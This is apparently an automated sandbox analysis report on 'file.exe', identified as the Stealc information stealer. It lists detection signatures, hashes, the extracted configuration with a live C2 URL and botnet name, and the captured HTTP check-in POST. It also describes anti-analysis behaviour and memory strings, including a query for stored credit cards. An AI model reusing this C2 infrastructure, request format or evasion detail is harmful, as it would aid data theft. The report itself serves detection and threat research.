
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565520
MD5: bb0c42d0421512d8f7796f5253543456
SHA1: 8b3139e22e253adc3b55d8743a7d4cc173aa567d
SHA256: 29ca807f5372fed46f73a09b357be9a41c7271307d273a20fe9045eeadce65e8
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BB0C42D0421512D8F7796F5253543456)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5436 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5436 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-30T04:12:02.565183+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.5436.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00124C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001260D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_001260D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00136AA0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00136AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001442C0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_001442C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00129B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00129B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012EB80 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0012EB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00136CB9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00136CB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00127750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00127750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001319F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001319F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00133A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00133A70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0012DB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0012DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001313B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001313A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013E3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013E3F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00134C70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00134C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00134C89
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001324F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001324F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001324E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_001324E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013CDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013CDD0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001216B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001216A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013D720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0013D720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013DF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0013DF20

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIJKJDAFHJDHIEBGCFID Content-Disposition: form-data; name="hwid" DA4010DC58231817704571 ------IIJKJDAFHJDHIEBGCFID Content-Disposition: form-data; name="build" drum ------IIJKJDAFHJDHIEBGCFID--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00124C50
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIJKJDAFHJDHIEBGCFID Content-Disposition: form-data; name="hwid" DA4010DC58231817704571 ------IIJKJDAFHJDHIEBGCFID Content-Disposition: form-data; name="build" drum ------IIJKJDAFHJDHIEBGCFID--
Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpf
Source: file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpj
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00129770

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047A8AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DA913
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E49BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CE1CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060F19C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DFA52
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00420A3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EEA8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E4B15
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E645A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056E463
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00451C1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004ED415
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DC4A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044D55E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E1D18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D8D92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00556DA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00433613
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00568727
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DDF37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E6FF7
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00124A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144820 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00144820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013CCD0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0013CCD0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\M2KPUCNO.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1840128 > 1048576
Source: file.exe | Static PE information: Raw size of sqwnkuay is bigger than: 0x100000 < 0x1a7400

Data Obfuscation

              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.120000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001468F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,Ge